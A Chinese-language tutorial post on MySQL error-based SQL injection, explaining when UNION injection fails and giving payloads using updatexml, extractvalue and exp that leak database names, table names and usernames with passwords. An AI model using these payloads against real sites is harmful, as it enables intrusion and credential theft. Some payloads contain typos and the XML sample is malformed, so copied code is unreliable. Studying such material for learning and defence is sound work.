11--sql注入-报错注入

一、union查询注入不使用的地方

1、注入语句无法截断,且不清楚完整的SQL查询语句;

2、页面不能返回查询信息的时候;

3、web页面中有两个SQL查询语句,查询语句的列数不同

二、关于MySQL处理XML

1、先准备以下XML文件内容

复制代码
<class id="wnCDCo85"> 
    <student sequence="1">
     <id>wncd20171215</id> 
</class>

三、报错注入

当union select 出现不使用的情形下,我们通常使用报错来进行注入。

报错注入的原理就是通过构造特殊的报错语句,使用MySQL数据库报错,

使我们查看内容显示在报错信息中,同时把报错信息显示在页面上。

通常的报错函数有updateXML(),extractvalue(),floor()等等。

大致报错的原理就是利用输入字符串逻辑上的冲突造成报错。

复制代码
1 and updatexml(1,concat(0x7e,database(),0x7e),1) 1 and updateexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.table where table_schema='learn'),0x7e),1)

这儿的group_concat是将报错的表名连接起来

补充:

?id=1' and select (select 1 from (select ))--+

使用exp报错

exp() 求e的n次方,exp(~(select 1))

extractvalue

updatexml

同属于xpath函数

特点:报错的内容只显示32位,如果想要都显示出来则可以

使用subsstr()函数,采用截取来获取每一个用户的值。

复制代码
?id=1' and updatexml(1,concat('-',(substr((select group_concat(username,password) from users),32,31))),1)--+

|--------------------------|-----------|
| 函数 | 含义 |
| extractvalue(文件名,文件路径) | |
| updatexml(文件名,文件路径,更新内容) | 对文件内容进行更新 |

updatexml(1,concat(-,database()),1)

在'-数据库名',无1这个文件

相关推荐
李枫月29 分钟前
Server2003 B-1 Windows操作系统渗透
网络安全·环境解析·server2003
量子-Alex2 小时前
【反无人机检测】C2FDrone:基于视觉Transformer网络的无人机间由粗到细检测
网络·transformer·无人机
Jeremy_Lee1233 小时前
grafana 批量视图备份及恢复(含数据源)
前端·网络·grafana
洛神灬殇3 小时前
【LLM大模型技术专题】「入门到精通系列教程」基于ai-openai-spring-boot-starter集成开发实战指南
网络·数据库·微服务·云原生·架构
上海云盾第一敬业销售3 小时前
高防IP可以防护什么攻击类型?企业网络安全的第一道防线
网络·tcp/ip·web安全
饮长安千年月4 小时前
JavaSec-SpringBoot框架
java·spring boot·后端·计算机网络·安全·web安全·网络安全
christine-rr4 小时前
征文投稿:如何写一份实用的技术文档?——以软件配置为例
运维·前端·网络·数据库·软件构建
happyh h h h p p p p5 小时前
部署DNS从服务器
运维·服务器·网络
心扬5 小时前
python网络编程
开发语言·网络·python·tcp/ip
恰薯条的屑海鸥6 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第九期-Unsafe Fileupload模块)(yakit方式)
网络·学习·安全·web安全·渗透测试·csrf·网络安全学习